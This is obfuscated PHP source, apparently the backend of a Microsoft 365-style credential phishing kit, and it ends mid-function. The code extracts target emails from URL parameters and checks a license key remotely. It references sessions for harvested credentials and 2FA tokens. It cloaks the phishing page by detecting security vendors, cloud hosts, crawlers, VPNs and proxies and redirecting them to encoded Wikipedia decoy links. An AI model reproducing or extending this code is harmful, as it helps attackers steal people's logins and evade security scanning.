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goto e97da; e97da: error_reporting(0); goto D9900; Be38c: session_start(); goto E1406; D9900: ini_set("display_errors", 0); goto Eb649; Eb649: if (!(session_status() == PHP_SESSION_NONE)) { goto c7e8a; } goto Be38c; E1406: c7e8a: goto af058; af058: class Config { private $A59a0; public function __construct(array $config) { $this->A59a0 = $config; } public function check_captcha() { goto c6c6b; ec6c0: return true; goto E8343; Afbb9: Ac0d8: goto f8ee4; A4669: C98e0: goto e2c55; E8343: goto C98e0; goto Afbb9; c6c6b: if (!$this->A59a0["captcha"]["active"]) { goto Ac0d8; } goto ec6c0; f8ee4: return false; goto A4669; e2c55: } public function getMimeType($bbcd6) { goto D1895; c15a2: df311: goto d026c; C918e: if (function_exists("mime_content_type")) { goto bf460; } goto A29ee; A0715: $B087f = mime_content_type($bbcd6); goto c15a2; A42a9: goto df311; goto Fa320; A29ee: $B087f = "application/octet-stream"; goto A42a9; d026c: return $B087f; goto a9b45; D1895: if (function_exists("finfo_file")) { goto f113c; } goto C918e; fdc02: $fe408 = finfo_open(FILEINFO_MIME_TYPE); goto bd293; Fa320: f113c: goto fdc02; daee5: bf460: goto A0715; bd293: $B087f = finfo_file($fe408, $bbcd6); goto c75b1; B9fb4: goto df311; goto daee5; c75b1: finfo_close($fe408); goto B9fb4; a9b45: } public function check_cloudflare() { goto Efc93; C9531: return true; goto e9f24; B5cb8: Af200: goto C405e; A1778: return false; goto B5cb8; Efc93: if (!$this->A59a0["cloudflare"]["active"]) { goto a4b54; } goto C9531; e9f24: goto Af200; goto Ac08e; Ac08e: a4b54: goto A1778; C405e: } public function check_captcha_status() { goto d566d; B37d5: return true; goto A80a2; B91df: return false; goto e068b; e068b: goto Ed036; goto fa8f8; d566d: if ($this->check_captcha() && !isset($_SESSION["captcha"])) { goto c6e13; } goto B91df; fa8f8: c6e13: goto B37d5; A80a2: Ed036: goto F5de1; F5de1: } public function check_cloudflare_status() { goto fdfbb; fca4e: return false; goto c91ef; bc6e7: return true; goto Acf5b; c91ef: goto da0f9; goto d8479; fdfbb: if ($this->check_cloudflare() && !isset($_SESSION["cloudflare"])) { goto eabab; } goto fca4e; Acf5b: da0f9: goto de83f; d8479: eabab: goto bc6e7; de83f: } public function getRandomVoiceTitle() { goto D3e9c; D3e9c: $f8f15 = ["Voice Mail Notification", "Voice Note Notification", "Voice Message", "Feel Voice Note", "Voice Note Drop Feel", "Voice Note Save Set Feel", "Voice Note Transmit Feel", "For Unse Voice Note"]; goto dc405; F25f3: return $f8f15[$ca9ae]; goto C26cf; dc405: $ca9ae = rand(0, 7); goto F25f3; C26cf: } public function checkBothCaptcha($A528b = 0) { goto cc9c1; B55b0: f13e6: goto Ef9d2; Ef9d2: eec38: goto Ab04d; f4a04: if (!($this->check_cloudflare_status() || $this->check_captcha_status())) { goto c2b4f; } goto e32c2; e32c2: $this->redirect("FailCaptchaStatus"); goto efded; c7d71: $this->redirect("FailCaptchaStatus"); goto B55b0; E4970: c8cbf: goto f4a04; A7db3: if ($A528b == 2) { goto b2e7e; } goto f0ff7; d6347: if (!$this->check_cloudflare_status()) { goto ccb13; } goto E463c; Ab2d1: e85ce: goto f925e; B29f0: b2e7e: goto d6347; cc9c1: if ($A528b == 0) { goto c8cbf; } goto A7db3; f925e: goto f730a; goto E4970; efded: c2b4f: goto A2f1c; D53be: if (!$this->check_captcha_status()) { goto f13e6; } goto c7d71; f0ff7: if (!($A528b == 1)) { goto eec38; } goto D53be; E463c: $this->redirect("FailCaptchaStatus"); goto d1de7; d1de7: ccb13: goto Ab2d1; A2f1c: f730a: goto f20b0; Ab04d: goto e85ce; goto B29f0; f20b0: } public function redirect($B1942 = '') { header("Location: " . $this->getRandomLink() . "#" . $B1942); exit; } public function auth() { goto c2a30; c24c8: unset($_SESSION["status"]); goto a47ae; d6327: if (isset($_SESSION["auth"])) { goto aee3a; } goto e7f9a; eeb3e: A9d2d: goto da6e8; Dbbe3: $this->redirect("InvalidKey"); goto cfa8e; Cbe1a: if (isset($_SESSION["auth"])) { goto e750a; } goto bb8b0; E194f: ea91d: goto D1271; d7e71: bfdf2: goto a3fea; A33bd: $d8f16 = dirname(__FILE__); goto C3cad; F5fbd: $this->redirect("KeyExpired"); goto f19c4; a57c9: $a3e00 = 2; goto d7e71; A3b32: c6f29: goto C1e03; Efbbb: B75e5: goto a437e; fa307: ba98b: goto bc3b0; dbc34: curl_setopt($Be897, CURLOPT_RETURNTRANSFER, true); goto Be260; a47ae: A842b: goto Eada6; d2540: unset($_SESSION["info_token_2fa"]); goto Ac1b4; E59aa: curl_setopt($Be897, CURLOPT_POSTFIELDS, http_build_query($F9771)); goto D2866; D2866: $Fcdbd = curl_exec($Be897); goto C3f4f; B70ed: if (!isset($_SESSION["status"])) { goto A842b; } goto c24c8; Bc4f4: aee3a: goto Acd0b; a843d: $F9771 = ["code" => $this->A59a0["key"]]; goto F3c5f; bc3b0: if (!isset($_SESSION["user_data"])) { goto B75e5; } goto Dca9a; db30a: $_SESSION["key"] = true; goto E194f; ae3c8: curl_close($Be897); goto Cbe1a; C1e03: if (!isset($_SESSION["cloudflare"])) { goto f57a7; } goto Dac1b; Eada6: if (!isset($_SESSION["info_token_credentials"])) { goto Db8be; } goto d46ca; c147f: unset($_SESSION["captcha"]); goto A3b32; D1271: goto ed96b; goto eeb3e; d46ca: unset($_SESSION["info_token_credentials"]); goto Ec513; C3f4f: if (curl_errno($Be897)) { goto A9d2d; } goto df7cb; Be260: curl_setopt($Be897, CURLOPT_POST, true); goto E59aa; e7f9a: $a3e00 = 1; goto Bc4f4; f19c4: goto ea91d; goto Bd783; e627e: B0690: goto A33bd; af21f: e750a: goto d6327; bb8b0: $a3e00 = 0; goto af21f; F3c5f: $Be897 = curl_init($a70df); goto dbc34; Acd0b: if (isset($_SESSION["auth"])) { goto bfdf2; } goto a57c9; E0487: ed96b: goto ae3c8; E770f: f1418: goto B70ed; Dac1b: unset($_SESSION["cloudflare"]); goto ab669; Cb321: $this->checkUserSecurity($F9771); goto Efbbb; a4ebe: if ($Fcdbd["live"] && !$Fcdbd["expired"]) { goto C7cd3; } goto Dbbe3; e89de: $a3e00 = 3; goto fa307; F2efb: if (!isset($_SESSION["captcha"])) { goto c6f29; } goto c147f; F875b: if (!isset($_SESSION["info_token_2fa"])) { goto Bbe1c; } goto d2540; C3cad: $a70df = ""; goto a843d; df7cb: $Fcdbd = json_decode($Fcdbd, true); goto Ad34d; cfa8e: C7cd3: goto db30a; Ad34d: if (isset($Fcdbd["live"])) { goto fd5ab; } goto F5fbd; a3fea: if (isset($_SESSION["auth"])) { goto ba98b; } goto e89de; c2a30: if (!isset($_SESSION["auth"])) { goto B0690; } goto F2efb; Ec513: Db8be: goto F875b; ab669: f57a7: goto b9648; Ac1b4: Bbe1c: goto e627e; b9648: if (!isset($_SESSION["email"])) { goto f1418; } goto Bdf29; Bd783: fd5ab: goto a4ebe; da6e8: $this->redirect("ServerError"); goto E0487; Bdf29: unset($_SESSION["email"]); goto E770f; Dca9a: $F9771 = $_SESSION["user_data"]; goto Cb321; a437e: } public function check_captcha_valid($Fcdbd) { goto f5ea7; F4f7e: $f39f0 = $Fcdbd ?? ''; goto d85f4; f2a75: exit; goto F997f; Ff911: goto f5806; goto d81b5; f5ea7: $F5eb9 = $this->A59a0["captcha"]["sitekey"]; goto F4f7e; eb8a6: header("Location: verify"); goto e1816; C2630: $_SESSION["captcha"] = true; goto eb8a6; Bbef2: $A571a = $c5459["action"] ?? ''; goto D0986; Ab0fc: $_SESSION["captcha"] = false; goto cc206; Fd456: $d0172 = $c5459["score"] ?? 0; goto Bbef2; D0986: if ($d0172 >= $this->A59a0["captcha"]["score"] && $A571a === "captcha") { goto Dc281; } goto Ab0fc; e1816: exit; goto D7b3e; cc206: $this->insertDataVisitor(false); goto eeec6; D7b3e: f5806: goto f2a75; d85f4: $Fcdbd = file_get_contents("" . urlencode($F5eb9) . "&response=" . urlencode($f39f0)); goto b1a0c; eeec6: $this->redirect("FailCaptcha"); goto Ff911; b1a0c: $c5459 = json_decode($Fcdbd, true); goto Fd456; d81b5: Dc281: goto C2630; F997f: } public function checkKey() { goto b1bf7; a8b86: ae882: goto f27e1; ccd15: die; goto a8b86; B7700: header("Location: " . $this->A59a0["folder"]); goto ccd15; b1bf7: if (!(empty($this->A59a0["key"]) || empty($this->A59a0["password"]))) { goto ae882; } goto B7700; f27e1: } public function check_cloudflare_valid($Fcdbd) { goto ffe86; Ccc3e: goto Ddf3d; goto Ddd0e; dcf3a: $c5459 = json_decode($E2475, true); goto f03c7; C33b0: $Be897 = curl_init(); goto B2833; f03c7: if ($c5459["success"]) { goto E655e; } goto bcd45; F99b0: Ddf3d: goto D8f0d; a72fc: curl_setopt($Be897, CURLOPT_POSTFIELDS, http_build_query($F9771)); goto C02f9; Ddd0e: E655e: goto Dd8d8; Cf1a1: $E2475 = curl_exec($Be897); goto ea587; B2833: curl_setopt($Be897, CURLOPT_URL, ""); goto Ca960; c2750: $F9771 = ["secret" => $Cb1e4, "response" => $Fcdbd]; goto C33b0; E5271: $this->redirect("ErrorCaptcha"); goto ffcf4; bd89d: curl_close($Be897); goto Af415; ffcf4: E88a5: goto bd89d; bcd45: $this->insertDataVisitor(false); goto e7d7b; D8f0d: goto E88a5; goto Fb33d; ea587: if (curl_errno($Be897)) { goto d0ee5; } goto dcf3a; Ca960: curl_setopt($Be897, CURLOPT_POST, true); goto a72fc; C02f9: curl_setopt($Be897, CURLOPT_RETURNTRANSFER, true); goto Cf1a1; e7d7b: $this->redirect("FailCaptcha"); goto Ccc3e; Dd8d8: $_SESSION["cloudflare"] = true; goto F99b0; ffe86: $Cb1e4 = $this->A59a0["cloudflare"]["cloudsitekey"]; goto c2750; Fb33d: d0ee5: goto E5271; Af415: } public function generateRandomString($e6e65 = 10) { return substr(str_shuffle(str_repeat($ed791 = "abcdefghijklomnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789", ceil($e6e65 / strlen($ed791)))), 1, $e6e65); } public function isValidEmail($E939e) { return filter_var($E939e, FILTER_VALIDATE_EMAIL) !== false; } public function decodeBase64Email($E939e) { goto Ec6b1; e7651: $d4894 = base64_decode($E939e, true); goto Ba0e5; Ff20c: return $d4894; goto D2a03; D2a03: cd7f1: goto e305c; Ba0e5: if (!($d4894 !== false && $this->isValidEmail($d4894))) { goto cd7f1; } goto Ff20c; Ec6b1: if (!$this->isValidEmail($E939e)) { goto Bef72; } goto Ca615; e305c: return ''; goto Dc62f; Cc40b: Bef72: goto e7651; Ca615: return $E939e; goto Cc40b; Dc62f: } public function getTitle() { goto f56f1; c6dcd: $E6ee8 = $this->A59a0["title"][$Ee26d]; goto f2d44; f56f1: $Ee26d = array_rand($this->A59a0["title"]); goto c6dcd; f2d44: return $E6ee8; goto C4064; C4064: } public function getSingleValidEmailFromQueryParameters() { goto afa52; afa52: $c006b = ["email", "e", "t", "target", "a"]; goto a2180; a2180: $E7b35 = array_intersect_key($_GET, array_flip($c006b)); goto E011e; E011e: if (!(count($E7b35) === 1)) { goto Ea7ac; } goto aad7d; Be199: $F4bfb = $E7b35[$e8220]; goto fcf3a; e8e9e: return ''; goto f0786; F0530: Ea7ac: goto e8e9e; aad7d: $e8220 = key($E7b35); goto Be199; fcf3a: return $this->decodeBase64Email($F4bfb); goto F0530; f0786: } public function getRandomLink() { goto F69b4; f2f4a: return $C8866; goto ce156; d92b2: $C8866 = base64_decode($E6fbf[$ca9ae]); goto f2f4a; b71e0: $ca9ae = rand(0, 11); goto d92b2; F69b4: $E6fbf = array("aHR0cHM6Ly9ocmVmLmxpLz9odHRwczovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9NaWNyb3NvZnRfMzY1", "aHR0cHM6Ly9ocmVmLmxpLz9odHRwczovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9MaXN0X29mX01pY3Jvc29mdF8zNjVfQXBwbGljYXRpb25z", "aHR0cHM6Ly9ocmVmLmxpLz9odHRwczovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9DYXRlZ29yeTpPZmZpY2VfMzY1", "aHR0cHM6Ly9ocmVmLmxpLz9odHRwczovL2lkLndpa2lwZWRpYS5vcmcvd2lraS9CZXJrYXM6TG9nb19NaWNyb3NvZnRfT2ZmaWNlXzM2NV8oMjAxMy0yMDE5KS5zdmc=", "aHR0cHM6Ly9ocmVmLmxpLz9odHRwczovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9NaWNyb3NvZnRfT2ZmaWNlX01peA==", "aHR0cHM6Ly9ocmVmLmxpLz9odHRwczovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9NaWNyb3NvZnRfRXhjaGFuZ2VfU2VydmVy", "aHR0cHM6Ly9ocmVmLmxpLz9odHRwczovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9FbWFpbF9jbGllbnQ=", "aHR0cHM6Ly9ocmVmLmxpLz9odHRwczovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9FbWFpbA==", "aHR0cHM6Ly9ocmVmLmxpLz9odHRwczovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9DbGllbnRfYWNjZXNzX2xpY2Vuc2U=", "aHR0cHM6Ly9ocmVmLmxpLz9odHRwczovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9XaW5kb3dzX1NlcnZlcl8yMDE2", "aHR0cHM6Ly9ocmVmLmxpLz9odHRwczovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9XaW5kb3dzX1NlcnZlcl8yMDE5", "aHR0cHM6Ly9ocmVmLmxpLz9odHRwczovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9JbnRlcm5ldF9FeHBsb3Jlcl8xMQ=="); goto b71e0; ce156: } public function getRandomTitle() { goto Ae591; E177c: return $f8f15[$B4814]; goto d8b90; Ae591: $f8f15 = ["Initializing..", "Processing..", "Completing..", "Secure Your Access"]; goto f8330; f8330: $B4814 = array_rand($f8f15); goto E177c; d8b90: } public function removeUrlParameters($a70df) { goto D09ab; A7f0f: $c6373 .= isset($c39bc["path"]) ? $c39bc["path"] : ''; goto f3e71; b952a: $c6373 = isset($c39bc["scheme"]) ? $c39bc["scheme"] . "://" : ''; goto a1fc6; a1fc6: $c6373 .= isset($c39bc["host"]) ? $c39bc["host"] : ''; goto A7f0f; f3e71: return $c6373; goto e920f; D09ab: $c39bc = parse_url($a70df); goto b952a; e920f: } public function removeLastTwoDirectories($a70df) { goto d9807; A1ac5: ee452: goto e2338; Caffc: $e56ea = (isset($c39bc["scheme"]) ? $c39bc["scheme"] . "://" : '') . (isset($c39bc["host"]) ? $c39bc["host"] : '') . $ec1c1; goto b99c1; e2338: return rtrim($e56ea, "/"); goto D5914; e6b36: $ec1c1 = "/" . implode("/", $c8ef1); goto Caffc; b99c1: if (!isset($c39bc["query"])) { goto ee452; } goto E97d4; d9807: $c39bc = parse_url($a70df); goto bfa52; E97d4: $e56ea .= "?" . $c39bc["query"]; goto A1ac5; bfa52: $c56a5 = explode("/", trim($c39bc["path"], "/")); goto e36f7; e36f7: $c8ef1 = array_slice($c56a5, 0, -2); goto e6b36; D5914: } public function getLastSegmentFromUrl() { goto a119b; e014d: Ea627: goto fe304; bf27a: if (!(count($E0385) > 1)) { goto Ea627; } goto Da6fb; A3ac1: $E0385 = explode("/", $Dac15); goto bf27a; Da6fb: return $E0385[count($E0385) - 2]; goto e014d; Df312: $Dac15 = trim($Dac15, "/"); goto A3ac1; abd75: $Dac15 = parse_url($a70df, PHP_URL_PATH); goto Df312; fe304: return null; goto C56ed; a119b: $a70df = $_SERVER["REQUEST_URI"]; goto abd75; C56ed: } public function validateLink() { goto a29ad; Ad5fc: Ca1e0: goto B43a1; a63cc: $this->redirect("LinkInvalid"); goto Ad5fc; F9887: if (!($this->getLastSegmentFromUrl() != $_SESSION["link"])) { goto Ca1e0; } goto a63cc; a29ad: if (isset($_SESSION["link"])) { goto F197d; } goto b2bac; b2bac: $this->redirect("LinkNotFound"); goto Ce10d; Ce10d: F197d: goto F9887; B43a1: } public function getFullUrl() { goto Ae80f; a8da9: $A85f9 = $_SERVER["REQUEST_URI"]; goto B8c38; B8c38: return $C279f . $B0c50 . $A85f9; goto ccbdc; a26a6: $B0c50 = $_SERVER["HTTP_HOST"]; goto a8da9; Ae80f: $C279f = !empty($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off" || $_SERVER["SERVER_PORT"] == 443 ? "https://" : "http://"; goto a26a6; ccbdc: } public function imageToBase64($D1f53) { goto e07b4; e07b4: $C61be = file_get_contents($D1f53); goto e3794; e3794: $c75f9 = base64_encode($C61be); goto fc276; Fcbef: return "data:{$B087f};base64,{$c75f9}"; goto D0634; fc276: $B087f = $this->getMimeType($D1f53); goto Fcbef; D0634: } public function getBackground() { goto c76af; C5995: B27c2: goto Adf4e; E9f4c: if (file_exists($D1f53)) { goto F6d79; } goto f83d1; Aaac8: if (file_exists($D1f53)) { goto b2685; } goto a7e3d; e3f29: C5654: goto E1847; Cb861: D09a8: goto Ffffa; d73b2: goto B27c2; goto e3f29; b88c4: $D1f53 = "page/images/" . $this->A59a0["background"] . ".png"; goto E9f4c; F1139: if (file_exists($D1f53)) { goto D09a8; } goto E24d5; E24d5: die("image not found."); goto Cb861; ab954: F6d79: goto F9b16; c76af: if ($this->A59a0["background"] == "custom") { goto C5654; } goto Ac1a1; a7b99: if (file_exists($D1f53)) { goto Cff7b; } goto b88c4; f83d1: die("image not found."); goto ab954; Adf4e: $Af573 = $this->imageToBase64($D1f53); goto c7b5c; Ac1a1: $D1f53 = "images/" . $this->A59a0["background"] . ".png"; goto a7b99; E1847: $D1f53 = "images/" . $this->A59a0["custom_background"]; goto Aaac8; c7b5c: return "
\xa body::before {
\xa content: ""; /* Empty content to allow the pseudo-element to render */
position: absolute; /* Absolute positioning */\xd
top: 0;\xd\xa left: 0;
\xa right: 0;\xd\xa bottom: 0;
z-index: -1; /* Ensure it stays behind other content */
\xa background-image: url("" . $Af573 . "");\xd\xa background-size: cover; /* Scale image to cover the entire area */
background-position: center; /* Center the background image */
background-repeat: no-repeat; /* Prevent repeating the image */
\xa }
"; goto f40d9; Ffffa: b2685: goto C5995; F9b16: Cff7b: goto d73b2; a7e3d: $D1f53 = "page/images/" . $this->A59a0["custom_background"]; goto F1139; f40d9: } public function getClientIp() { goto A7993; d2a9a: return "UNKNOWN"; goto e8e18; Ed162: foreach ($fba45 as $Dc982) { goto feb4b; D8859: if (!($A6d4e === "::1" || filter_var($A6d4e, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE))) { goto a0b0c; } goto a3bd7; Cfb99: fe589: goto Dc1af; fb291: $A6d4e = trim(explode(",", $_SERVER[$Dc982])[0]); goto D8859; feb4b: if (!array_key_exists($Dc982, $_SERVER)) { goto C12a4; } goto fb291; a3bd7: return $A6d4e; goto f7b5f; f7b5f: a0b0c: goto f736c; f736c: C12a4: goto Cfb99; Dc1af: } goto F5cd5; A7993: $fba45 = ["HTTP_X_FORWARDED_FOR", "HTTP_CLIENT_IP", "HTTP_X_CLUSTER_CLIENT_IP", "HTTP_FORWARDED_FOR", "HTTP_FORWARDED", "REMOTE_ADDR"]; goto Ed162; F5cd5: d04b1: goto d2a9a; e8e18: } public function getUserAgent() { goto B51c4; B51c4: if (isset($_SERVER["HTTP_USER_AGENT"])) { goto b1668; } goto D4f68; cf423: return $E69bf; goto A903c; fe189: $E69bf = htmlspecialchars(strip_tags($_SERVER["HTTP_USER_AGENT"]), ENT_QUOTES, "UTF-8"); goto cf423; D4f68: return "UNKNOWN"; goto ef9bb; A903c: a1c8c: goto C862a; a1cfa: b1668: goto fe189; ef9bb: goto a1c8c; goto a1cfa; C862a: } public function getClientLocation($A6d4e) { goto a6a47; Abdb7: $D9bce = curl_exec($Be897); goto B2c58; Ca1ef: $D9bce = json_decode($D9bce, true); goto D2f19; Cd2aa: curl_setopt($Be897, CURLOPT_URL, "" . $A6d4e); goto F6ac2; a6a47: $Be897 = curl_init(); goto Cd2aa; D50ff: c7e26: goto Dee13; F6ac2: curl_setopt($Be897, CURLOPT_RETURNTRANSFER, 1); goto c1645; c1645: curl_setopt($Be897, CURLOPT_CUSTOMREQUEST, "GET"); goto Abdb7; D2f19: return $D9bce; goto D50ff; B2c58: if (!($D9bce != '')) { goto c7e26; } goto Ca1ef; Dee13: } function isBlockedISP($D9bce) { goto Cceaa; Cceaa: $D25c8 = array("microsoft", "leaseweb", "m247", "amazon", "ovh", "cogent", "alibaba", "digitalocean", "choopa", "linode", "google", "oracle", "layerhost", "worldstream", "nextglobal", "itproximus", "hostroyale", "centurylink", "avast", "bitdefender", "webnx", "myloc"); goto Dcae4; Dcae4: $A1c5f = strtolower($D9bce); goto C5498; F22a6: c5c44: goto bce57; C5498: foreach ($D25c8 as $e0bce) { goto Bdc8a; c6085: return true; goto Fa02c; Bdc8a: if (!(stripos($A1c5f, $e0bce) !== false)) { goto f2b35; } goto c6085; Fa02c: f2b35: goto D079a; D079a: F20a7: goto C6bb3; C6bb3: } goto F22a6; bce57: return false; goto bae89; bae89: } public function checkUserSecurity($D9bce) { goto D7514; a4288: if (!($this->A59a0["bot"]["vpn"] == 1 && $D9bce["info"]["is_vpn"])) { goto e51ad; } goto Bffff; E7677: if ($D9bce["info"]["is_datacenter"] != false && $this->A59a0["bot"]["datacenter"] == 2) { goto F60f4; } goto a42e7; A0d99: $this->redirect("DummyBot"); goto D708c; ed37d: d57c9: goto B25d4; B7f4e: $this->redirect("DummyBot"); goto a9142; ba565: $this->redirect("DummyBot"); goto cbed3; B58bd: if (!($this->A59a0["bot"]["proxy"] == 1 && $D9bce["info"]["is_proxy"])) { goto ceadc; } goto Aaf49; a42e7: if (!($D9bce["info"]["is_datacenter"] != false && $this->A59a0["bot"]["datacenter"] == 1 && $D9bce["info"]["is_blocked_datacenter"] == true)) { goto F1a61; } goto ba565; e6e43: F60f4: goto B7f4e; Edb25: $this->redirect("DummyBot"); goto ed37d; cbed3: F1a61: goto D1608; A190f: if (!($this->A59a0["bot"]["datacenter"] != 0)) { goto A0bc7; } goto E7677; C20b6: e51ad: goto B58bd; Bffff: $this->redirect("DummyBot"); goto C20b6; e0dc8: ceadc: goto Cca76; Cca76: if (!($this->A59a0["bot"]["abuser"] == 1 && $D9bce["info"]["is_abuser"])) { goto d57c9; } goto Edb25; D1608: goto B23ac; goto e6e43; a9142: B23ac: goto e60a3; D7514: if (!$D9bce["info"]["status"]) { goto b6676; } goto Eaa89; D708c: c4e38: goto A190f; e60a3: A0bc7: goto a4288; B25d4: b6676: goto Ee873; Aaf49: $this->redirect("DummyBot"); goto e0dc8; Eaa89: if (!($this->A59a0["bot"]["crawler"] == 1 && $D9bce["info"]["is_crawler"])) { goto c4e38; } goto A0d99; Ee873: } public function insertUserInformation($A6d4e, $a998d = true) { goto Dfd6c; c5506: $D9bce["info"]["is_abuser"] = false; goto D481c; f6b12: $D9bce["info"]["is_proxy"] = false; goto c3c60; b01b7: $D9bce["info"]["city"] = $F4bb4["location"]["city"]; goto ad17c; dee37: if (!($D9bce["info"]["is_datacenter"] != false)) { goto d98c3; } goto e85d6; e1b96: $D9bce["info"]["is_vpn"] = false; goto ca68d; Bde5f: if (!($D9bce["info"]["is_blocked_datacenter"] == false)) { goto B20a1; } goto D6717; A5b1e: $D9bce["info"]["is_datacenter"] = $F4bb4["is_datacenter"]; goto Dd808; d3d68: A9738: goto c1f58; f8a10: Fa797: goto b9bff; C2369: $D9bce["info"]["country"] = false; goto b9295; a4d5a: $D9bce["info"]["is_blocked_datacenter"] = $this->isBlockedISP($F4bb4["datacenter"]["datacenter"]); goto D3c7a; Dfd6c: $D9bce["ip"] = $A6d4e; goto f6e55; c3c60: $D9bce["info"]["is_vpn"] = false; goto c5506; D481c: $D9bce["info"]["is_blocked_datacenter"] = false; goto F3b07; ec8f5: d98c3: goto E6d95; b9295: $D9bce["info"]["city"] = false; goto a61a0; e58d2: $D9bce["info"]["is_blocked_datacenter"] = false; goto Aa6d4; a794d: if (!isset($F4bb4["datacenter"]["datacenter"])) { goto E3dcc; } goto a4d5a; e2a4f: $D9bce["info"]["is_crawler"] = false; goto B9759; Aa6d4: goto B869c; goto d3d68; D0668: $D9bce["info"]["is_blocked_datacenter"] = false; goto dee37; B85cc: return $D9bce; goto C41c0; Da90c: $D9bce["info"]["city"] = false; goto e2a4f; da3ee: $D9bce["info"]["status"] = true; goto Ffa2d; A1756: B869c: goto B85cc; ac63b: B20a1: goto C39b3; ad17c: $D9bce["info"]["is_crawler"] = $F4bb4["is_crawler"]; goto A5b1e; D6717: if (!isset($F4bb4["datacenter"]["domain"])) { goto Fb5a9; } goto da385; ca68d: $D9bce["info"]["is_abuser"] = false; goto e58d2; F3b07: goto C4210; goto f8a10; da385: $D9bce["info"]["is_blocked_datacenter"] = $this->isBlockedISP($F4bb4["datacenter"]["domain"]); goto Bcf33; b9bff: if (!(isset($F4bb4["location"]) && isset($F4bb4["is_crawler"]) && isset($F4bb4["is_datacenter"]) && isset($F4bb4["is_proxy"]) && isset($F4bb4["is_vpn"]) && isset($F4bb4["is_abuser"]))) { goto d2163; } goto da3ee; d05a0: $D9bce["valid_captcha"] = $a998d; goto bab2b; c1f58: $F4bb4 = $this->getClientLocation($A6d4e); goto a6f4c; B36ac: $D9bce["info"]["is_vpn"] = $F4bb4["is_vpn"]; goto A1bbf; Ffa2d: $D9bce["info"]["country"] = $F4bb4["location"]["country"]; goto bad2a; F3860: C4210: goto A1756; C976a: $D9bce["info"]["status"] = false; goto d05a0; bad2a: $D9bce["info"]["country_code"] = $F4bb4["location"]["country_code"]; goto b01b7; bab2b: if ($D9bce["ip"] != "UNKNOWN" && $D9bce["valid_captcha"]) { goto A9738; } goto f55e1; a61a0: $D9bce["info"]["is_crawler"] = false; goto De4cb; E6d95: d2163: goto F3860; A1bbf: $D9bce["info"]["is_abuser"] = $F4bb4["is_abuser"]; goto D0668; D3c7a: E3dcc: goto Bde5f; C39b3: a4a44: goto ec8f5; a6f4c: if ($F4bb4 !== null && is_array($F4bb4)) { goto Fa797; } goto C2369; De4cb: $D9bce["info"]["is_datacenter"] = false; goto f6b12; B7975: $D9bce["info"]["is_proxy"] = false; goto e1b96; f55e1: $D9bce["info"]["country"] = false; goto Da90c; f6e55: $D9bce["ua"] = $this->getUserAgent(); goto C976a; Bcf33: Fb5a9: goto ac63b; B9759: $D9bce["info"]["is_datacenter"] = false; goto B7975; e85d6: if (!isset($F4bb4["datacenter"])) { goto a4a44; } goto a794d; Dd808: $D9bce["info"]["is_proxy"] = $F4bb4["is_proxy"]; goto B36ac; C41c0: } public function getBackgroundVerify($A463a = true, $f17c8 = '', $b8984 = false) { goto abb5e; aeddd: $D1f53 = "page/images/" . $this->A59a0["custom_background"]; goto Ee600; b73f4: $D1f53 = "images/" . $this->A59a0["background"] . ".png"; goto D3b87; Ee600: if (file_exists($D1f53)) { goto Af41d; } goto Dbda7; db5bb: goto cdbc5; goto C0a01; eca68: die("image not found."); goto B7c1d; E1cc9: if (file_exists($D1f53)) { goto A4ef3; } goto eca68; e255e: c8604: goto B871a; baf02: $Af573 = $this->imageToBase64($D1f53); goto db5bb; f2583: $D1f53 = "page/images/" . $this->A59a0["background"] . ".png"; goto E1cc9; c49d2: Cbe93: goto d585b; b5ee2: Af41d: goto e255e; abb5e: if ($this->A59a0["background"] == "custom") { goto Cbe93; } goto b73f4; cae11: return "\xd
\xa body {\xd
content: ""; /* Empty content to allow the pseudo-element to render */\xd\xa position: absolute; /* Absolute positioning */\xd
top: 0;\xd\xa left: 0;
right: 0;
bottom: 0;\xd
z-index: -1; /* Ensure it stays behind other content */
background-image: url("" . $Af573 . "");\xd
background-size: cover; /* Scale image to cover the entire area */
\xa background-position: center; /* Center the background image */
background-repeat: no-repeat; /* Prevent repeating the image */\xd
} \xd\xa "; goto E1c71; c6b50: if (!$A463a) { goto fc295; } goto baf02; ed415: goto d616a; goto c49d2; C0a01: fc295: goto daf84; a8e89: if (file_exists($D1f53)) { goto c8604; } goto aeddd; d585b: $D1f53 = "images/" . $this->A59a0["custom_background"]; goto a8e89; B871a: d616a: goto c6b50; F4b32: cdbc5: goto f1b09; Dcfec: ad65d: goto cae11; Dbda7: die("image not found."); goto b5ee2; daf84: $Af573 = $f17c8; goto F4b32; D5045: b365d: goto ed415; f1b09: if (!$b8984) { goto ad65d; } goto c333a; D3b87: if (file_exists($D1f53)) { goto b365d; } goto f2583; B7c1d: A4ef3: goto D5045; c333a: return $Af573; goto Dcfec; E1c71: } public function getFirstMessage() { goto Fa4b7; Ba99c: ef5dd: goto caa1a; E325c: if ($dfc24 == "text") { goto cf817; } goto C1d92; db7e8: return "Because you're accessing sensitive info, you need to verify your password"; goto B2e9f; B6bd3: return ''; goto f6516; a0d57: cf817: goto f985b; B39cc: cc002: goto B6bd3; f6516: Ab1b5: goto e7141; f985b: return $this->A59a0["custom_firstmessage"]; goto Fb5f5; a53fa: if ($dfc24 == "default") { goto c6e94; } goto E325c; B407c: goto Bae1d; goto C89c2; C89c2: c6e94: goto db7e8; Ee0d8: return "<img src="" . $this->imageToBase64("../" . $this->A59a0["custom_firstmessage"]) . "" alt="Icon" style="width: 50%; height: auto;" class="d-block"/>"; goto Ba99c; caa1a: goto F2bfa; goto a0d57; f7cff: if ($dfc24 == "none") { goto cc002; } goto a53fa; Fb5f5: F2bfa: goto B407c; B2e9f: Bae1d: goto d5d9d; d5d9d: goto Ab1b5; goto B39cc; C1d92: if (!($dfc24 == "images")) { goto ef5dd; } goto Ee0d8; Fa4b7: $dfc24 = $this->A59a0["first_message"]; goto f7cff; e7141: } public function 